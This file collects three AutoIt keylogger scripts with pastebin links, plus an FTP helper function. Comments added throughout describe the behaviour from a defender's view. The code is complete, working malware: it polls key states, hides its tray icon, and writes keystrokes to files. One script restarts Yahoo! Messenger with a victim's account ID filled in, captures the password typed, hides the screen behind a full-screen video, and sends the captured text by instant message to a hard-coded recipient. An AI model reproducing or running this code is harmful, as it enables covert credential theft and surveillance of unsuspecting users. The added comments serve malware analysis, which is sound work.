; Creates directory $DirName on the FTP server.
; Unlike _FTP_FileSend this function takes no connection parameters; it reads
; $Server, $Username and $Password from the script-level variables.
; Return values of the FTP calls are not checked. Nothing in the visible script
; calls this function.
Func _FTP_CreateDir($DirName)

$oFTP = _FTP_Open("myftp")
$oConnect = _FTP_Connect($oFTP, $Server, $Username, $Password)

_FTP_DirCreate($oConnect, $DirName)

_FTP_Close($oFTP)

EndFunc

Keylogger3.au3

http://pastebin.com/SA93wkw5
____________________________________

Opt("SendKeyDelay",150)
Opt("SendKeyDownDelay",50)
; $f_path: the log is written to keylog.txt inside the Windows system
; directory. A user-created text file in that directory that keeps growing is a
; simple host indicator; writing there normally needs elevated rights.
Global $keyf,$keyup,$ckok=False,$f_path = @SystemDir & "\keylog.txt"
; $shdown / $shup track whether the next Shift transition still has to be logged.
Global $shdown=True,$shup
; Timestamp taken once at start-up and written as the first line of the session.
Global $sDateTime = @YEAR & "-" & @MON & "-" & @MDAY &" "&@HOUR & ":" & @MIN & ":" & @SEC
;Separate hex and char
; $hex holds virtual-key codes as hex strings and $char the label written to
; the log for the code at the same index. StringSplit stores the element count
; at index 0, so both arrays are used from index 1.
$hex = StringSplit("08,09,0d,10,11,12,13,14,1b,20,21,22,23,24,25,26,27,28,2c,2d,2e," & _
"30,31,32,33,34,35,36,37,38,39,41,42,43,44,45,46,47,48,49,4a,4b,4c,4d,4e,4f,50,51,52,53,54,55,56,57,58,59,5a," & _
"ba,bb,bc,bd,be,bf,c0,db,dc,dd,5b,5c", _
",")
$char = StringSplit(" BACKSPACE , TAB , ENTER , SHIFT , CTR , ALT , PAUSE , CAPLOCKS , ESC , SPACE , PAGEUP , PAGEDOWN , END , HOME , LEFT , UP , RIGHT , DOWN , PRINTSCR , INS , DEL ," & _
"0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z" & _
" ; , = , dot , - , . , / , ` , [ , \ , ], lWIN , rWIN ", _
",")
;=>End
; Ctrl+Alt+Win+F12 runs thoat(), which opens the log and ends the script.
HotKeySet ("^!#{f12}","thoat")
; Exit handler bound to the hotkey registered just before this function:
; closes the user32.dll handle and the log file, opens the log in Notepad and
; terminates the script.
Func thoat()
DllClose($dll)
FileClose($file)
Run("notepad.exe " & $f_path)
Exit
EndFunc
;;=> Ket thuc ham
; Create the log file on first run, then open it for appending (mode 1).
If Not FileExists($f_path) Then _FileWriteLog($f_path,'')
$dll = DllOpen("user32.dll")
$file = FileOpen($f_path, 1)
If $file = -1 Then
; The message strings are Vietnamese: "Error" / "Cannot open file".
MsgBox(0, "Loi", "Khong the mo file")
Exit
EndIf
; Start the session with the timestamp captured at start-up.
FileWriteLine($file, $sDateTime)
; Poll the keyboard roughly every 10 ms. The loop has no exit condition, so the
; DllClose after WEnd is not reached; the script ends through thoat().
While 1
Sleep ( 10 )
readchar()
WEnd
DllClose($dll)
; One polling pass over every virtual-key code in $hex.
; For each code:
;  * if the key is down and Shift (0x10) is down as well, " SHIFTDOWN " is
;    written once (guarded by $shdown) and the key itself is not written in
;    this pass;
;  * if the key is down and Shift is not, the code is stored in $keyup,
;    checkku() waits for the key to be released, and writechar() writes the
;    label from $char at the same index;
;  * otherwise, if Shift is released and $shup is set, " SHIFTUP " is written
;    once.
; Key state comes from GetAsyncKeyState via _IsPressed / _IsRelease, i.e. the
; script polls instead of installing a keyboard hook.
Func readchar()
For $i = 1 to $hex[0]
Select
Case _IsPressed($hex[$i],$dll)
If _IsPressed("10", $dll) Then
if $shdown ==True Then
FileWrite($file," SHIFTDOWN ")
Sleep(30)
$shdown= False
$shup= True
EndIf
Else
$keyup = $hex[$i]
checkku()
writechar($char[$i])
EndIf
Case _IsRelease("10", $dll)
if $shup== True Then
FileWrite($file," SHIFTUP ")
Sleep(30)
$shdown= True
$shup= False
EndIf
EndSelect
Next
EndFunc
; Waits until the key whose code is in $keyup has been released, then sets
; $ckok to True. The loop contains no Sleep, so it spins while the key is held.
Func checkku()
Do
If _IsRelease($keyup,$dll) then
$ckok =True
EndIf
Until $ckok =true
EndFunc
; Appends $keyf to the open log file when $ckok is set, then clears $ckok.
;   $keyf - text to write (default: empty string)
; Exits the script with a message box if the log handle is invalid; the
; message strings are Vietnamese: "Error" / "Cannot open file.".
Func writechar($keyf= "")
If $file = -1 Then
MsgBox(0, "Loi", "Khong the mo file.")
Exit
EndIf
If $ckok =true then
FileWrite($file,$keyf)
Sleep(10)
$ckok =False
EndIf
EndFunc
; Returns 1 when the key with virtual-key code $sHexKey (hex digits without
; "0x") is currently down, otherwise 0.
;   $vDLL - DLL handle or name used for the call (default 'user32.dll')
; GetAsyncKeyState sets bit 0x8000 of its result while the key is held.
Func _IsPressed($sHexKey, $vDLL = 'user32.dll')
Local $a_R = DllCall($vDLL, "int", "GetAsyncKeyState", "int", '0x' & $sHexKey)
If Not @error And BitAND($a_R[0], 0x8000) = 0x8000 Then Return 1
Return 0
EndFunc
; Inverse of _IsPressed: returns 0 while the key is down and 1 otherwise.
; A failed DllCall also yields 1, so errors are reported as "released".
Func _IsRelease($sHexKey, $vDLL = 'user32.dll')
Local $a_R = DllCall($vDLL, "int", "GetAsyncKeyState", "int", '0x' & $sHexKey)
If Not @error And BitAND($a_R[0], 0x8000) = 0x8000 Then Return 0
Return 1
EndFunc
; Writes "<date> <time> : <message>" as one line to $sLogPath.
;   $sLogPath - file to write
;   $sLogMsg  - message text
;   $iFlag    - -1 (default) appends the line; any other value puts the new
;               line first, followed by the previous file content, and
;               rewrites the file (open mode 2)
; Returns the result of FileClose on success.
; On failure returns 0 with @error = 1 (open failed) or 2 (write failed); in
; the write-failure case the handle is not closed before returning.
Func _FileWriteLog($sLogPath, $sLogMsg, $iFlag = -1)
Local $sDateNow, $sTimeNow, $sMsg, $iWriteFile, $hOpenFile, $iOpenMode = 1
$sDateNow = @YEAR & "-" & @MON & "-" & @MDAY
$sTimeNow = @HOUR & ":" & @MIN & ":" & @SEC
$sMsg = $sDateNow & " " & $sTimeNow & " : " & $sLogMsg
If $iFlag <> -1 Then
$sMsg &= @CRLF & FileRead($sLogPath)
$iOpenMode = 2
EndIf
$hOpenFile = FileOpen($sLogPath, $iOpenMode)
If $hOpenFile = -1 Then Return SetError(1, 0, 0)
$iWriteFile = FileWriteLine($hOpenFile, $sMsg)
If $iWriteFile = -1 Then Return SetError(2, 0, 0)
Return FileClose($hOpenFile)
EndFunc ;

Keylogger2.au3

http://pastebin.com/nU9Gm1WJ
__________________________________________
#NotrayIcon
#include
;==============================
; AutoIt
; Simple KeyLogger Function
;==============================

sGetKey()

; Endless polling loop: for every virtual-key code from 1 to 255 it calls
; _WinAPI_GetAsyncKeyState and, when the result is -32767 (0x8001 as a 16-bit
; value: key down and pressed since the previous call), appends Chr(code) to
; Log.txt on the current user's Desktop.
; The file is opened in append mode and closed again for every recorded key.
; The loop has no Sleep, so the process polls continuously; together with the
; #NoTrayIcon directive at the top of the script and the growing Log.txt this
; is what the sample looks like on a host.
Func sGetKey()

While 1

Local  $sKey, $Result , $Log

For $sKey = 1 To 255

$Result = _WinAPI_GetAsyncKeyState($sKey)

If $Result = -32767 then

; The raw virtual-key code is converted with Chr(), without regard to Shift or
; keyboard layout.
$Result = Chr($sKey)

$Log = FileOpen(@DesktopDir & "\Log.txt", 1)

FileWrite($Log, $Result)

FileClose($Log)

EndIf

Next

WEnd

Endfunc

Keylogger.au3

http://pastebin.com/5mVUtsQm
__________________________________
    ; Run without a tray icon and keep one user32.dll handle open for the
    ; GetAsyncKeyState calls made by _IsPressed.
    #NoTrayIcon
    Opt("SendKeyDownDelay", 50)
    $UserDll = DllOpen("user32.dll")
    ; Returns 1 when GetAsyncKeyState reports any non-zero state for virtual-key
    ; code $hexKey, otherwise 0. Because the whole result is compared with 0,
    ; both "currently down" and "pressed since the last call" count as pressed.
    ; The DllCall result is indexed without checking @error.
    Func _IsPressed($hexKey)
    Local $aR, $bO
    $aR = DllCall($UserDll, "int", "GetAsyncKeyState", "int", $hexKey)
    If $aR[0] <> 0 Then
        $bO = 1
    Else
        $bO = 0
    EndIf
    Return $bO
    EndFunc
    ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
    ;$window2=wingettitle("")
    $log= @ScriptDir
    ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
    ; Account name that is typed into the Yahoo! Messenger sign-in window below.
    $idvictim="nguyentrihai93"
    ; $var accumulates the captured keys in memory; this script writes no log file.
    $var=string("")
    ; Force a fresh sign-in: close any running Yahoo! Messenger, start it again
    ; and wait for its window.
    ProcessClose("YahooMessenger.exe")
    ProcessWaitClose("YahooMessenger.exe")
    Run(@ProgramFilesDir & "\Yahoo!\Messenger\YahooMessenger.exe")
    WinWaitActive("Yahoo! Messenger")
    $yahoo_handle = WinGetHandle("[active]")
    ; Disabled lure dialog (original text is Vietnamese):
    ;MsgBox(0,"Notice","You need to re-confirm your account to receive a gift")
    ; Fill control 211 with the account name and click control 212.
    ; Defender view: a messenger that restarts by itself with the ID field
    ; already filled in is the user-visible sign of this sample.
    ControlSetText($yahoo_handle,'',211,$idvictim)
    ControlClick($yahoo_handle,"",212)
    ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
    Global $var
    ; Appends $what2log to the global $var buffer (passed through StringAddCR)
    ; and pauses 100 ms.
    Func _LogKeyPress($what2log)
            $var=StringAddCR($var & $what2log)
            Sleep(100)
    EndFunc
    ; Endless polling loop: each pass tests a fixed list of virtual-key codes
    ; with _IsPressed and appends a label for every key found down to $var via
    ; _LogKeyPress, then calls senddata().
    ; Letters are always recorded in lower case; the Shift, Ctrl and Alt keys
    ; are recorded as separate labels. The checks for 0x77-0x79 (F8-F10) appear
    ; twice.
    Func logkey()
    While 1
    If _IsPressed(0xBA) = 1 Then _LogKeyPress('; ')
    If _IsPressed(0xBB) = 1 Then _LogKeyPress('= ')
    If _IsPressed(0xBC) = 1 Then _LogKeyPress(', ')
    If _IsPressed(0xBD) = 1 Then _LogKeyPress('- ')
    If _IsPressed(0xBE) = 1 Then _LogKeyPress('. ')
    If _IsPressed(0xBF) = 1 Then _LogKeyPress('/ ')
    If _IsPressed(0xC0) = 1 Then _LogKeyPress('` ')
    If _IsPressed(0xDB) = 1 Then _LogKeyPress('[ ')
    If _IsPressed(0xDC) = 1 Then _LogKeyPress('\ ')
    If _IsPressed(0xDD) = 1 Then _LogKeyPress('] ')
    If _IsPressed(0xDE) = 1 Then _LogKeyPress("' ")
    If _IsPressed(0x08) = 1 Then _LogKeyPress('{BACKSPACE.} ')
    If _IsPressed(0x09) = 1 Then _LogKeyPress('{TAB.} ')
    If _IsPressed(0x0D) = 1 Then _LogKeyPress('{ENTER.} ')
    If _IsPressed(0x14) = 1 Then _LogKeyPress('{CAPSLOCK.} ')
    If _IsPressed(0x1B) = 1 Then _LogKeyPress('{ESC.} ')
    If _IsPressed(0x20) = 1 Then _LogKeyPress(' ')
    If _IsPressed(0x23) = 1 Then _LogKeyPress('{END.} ')
    If _IsPressed(0x24) = 1 Then _LogKeyPress('{HOME.} ')
    If _IsPressed(0x25) = 1 Then _LogKeyPress('{LEFT ARROW} ')
    If _IsPressed(0x26) = 1 Then _LogKeyPress('{UP ARROW} ')
    If _IsPressed(0x27) = 1 Then _LogKeyPress('{RIGHT ARROW} ')
    If _IsPressed(0x28) = 1 Then _LogKeyPress('{DOWN ARROW} ')
    If _IsPressed(0x2C) = 1 Then _LogKeyPress('{PRINT SCREEN} ')
    If _IsPressed(0x2D) = 1 Then _LogKeyPress('{INS.} ')
    If _IsPressed(0x2E) = 1 Then _LogKeyPress('{DEL.} ')
    If _IsPressed(0x30) = 1 Then _LogKeyPress('0')
    If _IsPressed(0x31) = 1 Then _LogKeyPress('1')
    If _IsPressed(0x32) = 1 Then _LogKeyPress('2')
    If _IsPressed(0x33) = 1 Then _LogKeyPress('3')
    If _IsPressed(0x34) = 1 Then _LogKeyPress('4')
    If _IsPressed(0x35) = 1 Then _LogKeyPress('5')
    If _IsPressed(0x36) = 1 Then _LogKeyPress('6')
    If _IsPressed(0x37) = 1 Then _LogKeyPress('7')
    If _IsPressed(0x38) = 1 Then _LogKeyPress('8')
    If _IsPressed(0x39) = 1 Then _LogKeyPress('9')
    If _IsPressed(0x41) = 1 Then _LogKeyPress('a')
    If _IsPressed(0x42) = 1 Then _LogKeyPress('b')
    If _IsPressed(0x43) = 1 Then _LogKeyPress('c')
    If _IsPressed(0x44) = 1 Then _LogKeyPress('d')
    If _IsPressed(0x45) = 1 Then _LogKeyPress('e')
    If _IsPressed(0x46) = 1 Then _LogKeyPress('f')
    If _IsPressed(0x47) = 1 Then _LogKeyPress('g')
    If _IsPressed(0x48) = 1 Then _LogKeyPress('h')
    If _IsPressed(0x49) = 1 Then _LogKeyPress('i')
    If _IsPressed(0x4A) = 1 Then _LogKeyPress('j')
    If _IsPressed(0x4B) = 1 Then _LogKeyPress('k')
    If _IsPressed(0x4C) = 1 Then _LogKeyPress('l')
    If _IsPressed(0x4D) = 1 Then _LogKeyPress('m')
    If _IsPressed(0x4E) = 1 Then _LogKeyPress('n')
    If _IsPressed(0x4F) = 1 Then _LogKeyPress('o')
    If _IsPressed(0x50) = 1 Then _LogKeyPress('p')
    If _IsPressed(0x51) = 1 Then _LogKeyPress('q')
    If _IsPressed(0x52) = 1 Then _LogKeyPress('r')
    If _IsPressed(0x53) = 1 Then _LogKeyPress('s')
    If _IsPressed(0x54) = 1 Then _LogKeyPress('t')
    If _IsPressed(0x55) = 1 Then _LogKeyPress('u')
    If _IsPressed(0x56) = 1 Then _LogKeyPress('v')
    If _IsPressed(0x57) = 1 Then _LogKeyPress('w')
    If _IsPressed(0x58) = 1 Then _LogKeyPress('x')
    If _IsPressed(0x59) = 1 Then _LogKeyPress('y')
    If _IsPressed(0x5A) = 1 Then _LogKeyPress('z')
    If _IsPressed(0x5B) = 1 Then _LogKeyPress('{LEFT WIN} ')
    If _IsPressed(0x5C) = 1 Then _LogKeyPress('{RIGHT WIN} ')
    If _IsPressed(0x60) = 1 Then _LogKeyPress('0')
    If _IsPressed(0x61) = 1 Then _LogKeyPress('1')
    If _IsPressed(0x62) = 1 Then _LogKeyPress('2')
    If _IsPressed(0x63) = 1 Then _LogKeyPress('3')
    If _IsPressed(0x64) = 1 Then _LogKeyPress('4')
    If _IsPressed(0x65) = 1 Then _LogKeyPress('5')
    If _IsPressed(0x66) = 1 Then _LogKeyPress('6')
    If _IsPressed(0x67) = 1 Then _LogKeyPress('7')
    If _IsPressed(0x68) = 1 Then _LogKeyPress('8')
    If _IsPressed(0x69) = 1 Then _LogKeyPress('9')
    If _IsPressed(0x6A) = 1 Then _LogKeyPress('{MULTIPLY} ')
    If _IsPressed(0x6B) = 1 Then _LogKeyPress('{ADD} ')
    If _IsPressed(0x70) = 1 Then _LogKeyPress('F1 ')
    If _IsPressed(0x71) = 1 Then _LogKeyPress('F2 ')
    If _IsPressed(0x72) = 1 Then _LogKeyPress('F3 ')
    If _IsPressed(0x73) = 1 Then _LogKeyPress('F4 ')
    If _IsPressed(0x74) = 1 Then _LogKeyPress('F5 ')
    If _IsPressed(0x75) = 1 Then _LogKeyPress('F6 ')
    If _IsPressed(0x76) = 1 Then _LogKeyPress('F7 ')
    If _IsPressed(0x77) = 1 Then _LogKeyPress('F8 ')
    If _IsPressed(0x78) = 1 Then _LogKeyPress('F9 ')
    If _IsPressed(0x79) = 1 Then _LogKeyPress('F10 ')
    If _IsPressed(0x77) = 1 Then _LogKeyPress('F8 ')
    If _IsPressed(0x78) = 1 Then _LogKeyPress('F9 ')
    If _IsPressed(0x79) = 1 Then _LogKeyPress('F10 ')
    If _IsPressed(0x7A) = 1 Then _LogKeyPress('F11 ')
    If _IsPressed(0x7B) = 1 Then _LogKeyPress('F12 ')
    If _IsPressed(0x7C) = 1 Then _LogKeyPress('F13 ')
    If _IsPressed(0x7D) = 1 Then _LogKeyPress('F14 ')
    If _IsPressed(0x7E) = 1 Then _LogKeyPress('F15 ')
    If _IsPressed(0x7F) = 1 Then _LogKeyPress('F16 ')
    If _IsPressed(0x80) = 1 Then _LogKeyPress('F17 ')
    If _IsPressed(0x81) = 1 Then _LogKeyPress('F18 ')
    If _IsPressed(0x82) = 1 Then _LogKeyPress('F19 ')
    If _IsPressed(0x83) = 1 Then _LogKeyPress('F20 ')
    If _IsPressed(0x84) = 1 Then _LogKeyPress('F21 ')
    If _IsPressed(0x85) = 1 Then _LogKeyPress('F22 ')
    If _IsPressed(0x86) = 1 Then _LogKeyPress('F23 ')
    If _IsPressed(0x87) = 1 Then _LogKeyPress('F24 ')
    If _IsPressed(0x90) = 1 Then _LogKeyPress('{NUM LOCK} ')
    If _IsPressed(0x91) = 1 Then _LogKeyPress('{SCROLL LOCK} ')
    If _IsPressed(0xA0) = 1 Then _LogKeyPress('{SHIFT} ')
    If _IsPressed(0xA1) = 1 Then _LogKeyPress('{SHIFT} ')
    If _IsPressed(0xA2) = 1 Then _LogKeyPress('{CTRL} ')
    If _IsPressed(0xA3) = 1 Then _LogKeyPress('{CTRL} ')
    If _IsPressed(0xA4) = 1 Then _LogKeyPress('{ALT.} ')
    If _IsPressed(0xA5) = 1 Then _LogKeyPress('{ALT.} ')  
    senddata()
    Wend
    EndFunc
    
    While 1
            logkey()
          
    WEnd
    ; Called at the end of every polling pass in logkey().
    ; Nothing is sent until a click on the messenger control "ATL:009B0F981"
    ; succeeds. When it does, the function
    ;   1. starts Internet Explorer, pins it on top, sends F11 and the video
    ;      link to it (presumably to cover the screen while the rest runs -
    ;      confirm);
    ;   2. puts the hard-coded recipient ID into the same messenger control and
    ;      presses Enter;
    ;   3. places the captured text ($var) into the conversation input window
    ;      and sends it, then exits the script.
    ; Both branches of the inner If perform the send and exit.
    ; The captured data leaves the host as an ordinary instant message from the
    ; signed-in account, so the sent-message history of that account is where
    ; the evidence ends up; the script itself opens no network connection.
    Func senddata()
            $link="http://www.youtube.com/watch?v=3ZIcu_Sv5oI&feature=player_embedded"
            $z=ControlClick($yahoo_handle, "", "ATL:009B0F981")
            if $z=1 Then
                    Run(@ProgramFilesDir & "\Internet Explorer\iexplore.exe")
                    WinWaitActive("[Class:IEFrame]")
                    WinSetOnTop ( "[Class:IEFrame]", "",1)
                    $IE_handle = WinGetHandle("[active]")
                    ControlSend($IE_handle,"","ToolbarWindow324","{f11}")
                    ControlSend($IE_handle,"","ToolbarWindow324",$link & "{enter}")
                    $idnhan="phieulang_hoanguit"
                    $x=ControlSetText($yahoo_handle, "", "ATL:009B0F981",$idnhan)
            if $X=1 then
                    ControlSend($yahoo_handle, "", "ATL:009B0F981","{enter}")
                    WinActivate($IE_handle)
                    $y = ControlSetText("[Class:CConvWndBase]","","YIMInputWindow1",$var)
                    if $y=1 Then
                            ControlSend("[Class:CConvWndBase]","","YIMInputWindow1","{enter}{esc}")
                            Exit
                    Else
                            ControlSetText("[Class:CConvWndBase]","","YIMInputWindow1",$var)
                            ControlSend("[Class:CConvWndBase]","","YIMInputWindow1","{enter}{esc}")
                            Exit
                    EndIf
            EndIf
            EndIf
       Sleep(100)
    EndFunc